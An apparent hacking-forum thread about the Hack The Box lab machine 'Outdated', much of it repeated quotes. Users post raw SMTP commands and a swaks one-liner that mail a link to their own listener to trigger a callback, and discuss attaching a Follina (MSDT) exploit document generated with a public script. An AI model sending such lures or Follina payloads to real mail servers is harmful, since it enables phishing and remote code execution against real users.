Outdated - HTB
thanks
Reply
(August 14, 2022, 10:34 AM)xiorat89 Wrote:
(August 13, 2022, 07:48 PM)fironeDerbert Wrote:
(August 13, 2022, 07:43 PM)Hacker2222 Wrote: quick root blood ..... must be cve for insta root?


Run this line by line and you'll get a ping on your port 80

telnet mail.outdated.htb 25
HELO client
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Subject: abc

http://10.10.XX.XX/XX
.
QUIT


Does this work for other people? This was the first thing I tried with swaks and manually and I never got any request


This works for me:

perl swaks.pl --to [email protected] --from [email protected] --server mail.outdated.htb --body "http://10.10.xxx.xxx/test"

Doesn't seem very reliable. I have to issue this command two or three times before getting a request. Also, a link to test.doc doesn't seem to work. Attachments might work though.
Reply
I tried manually and with swaks as well, isn't working for me. No hits on my server.
Reply
(August 14, 2022, 06:24 PM)Exa Wrote:
(August 14, 2022, 10:34 AM)xiorat89 Wrote:
(August 13, 2022, 07:48 PM)fironeDerbert Wrote:
(August 13, 2022, 07:43 PM)Hacker2222 Wrote: quick root blood ..... must be cve for insta root?


Run this line by line and you'll get a ping on your port 80

telnet mail.outdated.htb 25
HELO client
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Subject: abc

http://10.10.XX.XX/XX
.
QUIT


Does this work for other people? This was the first thing I tried with swaks and manually and I never got any request


This works for me:

perl swaks.pl --to [email protected] --from [email protected] --server mail.outdated.htb --body "http://10.10.xxx.xxx/test"

Doesn't seem very reliable. I have to issue this command two or three times before getting a request. Also, a link to test.doc doesn't seem to work. Attachments might work though.

I've tried every possibility to send email with telnet, swaks, python scripts and no callbacks to my server or to download exploit if I used attach option... tried to use responder and send link even :D
Reply
I attached a doc file from https://github.com/JohnHammond/msdt-follina to the mail.
When running python3 follina.py it is important to include the interface parameter.

Using any.run, I can see that the callback works:
https://app.any.run/tasks/382cf545-43b4-44b2-93c6-1eee7ccc0c52

However, I get no callback from Outdated. Did anyone actually manage to exploit Follina on this box or was this just a guess?
Reply
(August 13, 2022, 09:02 PM)yumi Wrote: ggggggggggggg
Reply
thanks
Reply
(August 14, 2022, 07:39 PM)Exa Wrote: I attached a doc file from https://github.com/JohnHammond/msdt-follina to the mail.
When running python3 follina.py it is important to include the interface parameter.

Using any.run, I can see that the callback works:
https://app.any.run/tasks/382cf545-43b4-44b2-93c6-1eee7ccc0c52

However, I get no callback from Outdated. Did anyone actually manage to exploit Follina on this box or was this just a guess?


Using Follina is intended. Probably they broke something looking at Discord feedback. One person mentioned that the count on the low-priv and admin pwnage has stopped. On my side I don't get callbacks also.
Reply
It was working yesterday before the zero login patch, I'll try one more time here.
Reply
(August 13, 2022, 09:02 PM)yumi Wrote: thank
Reply

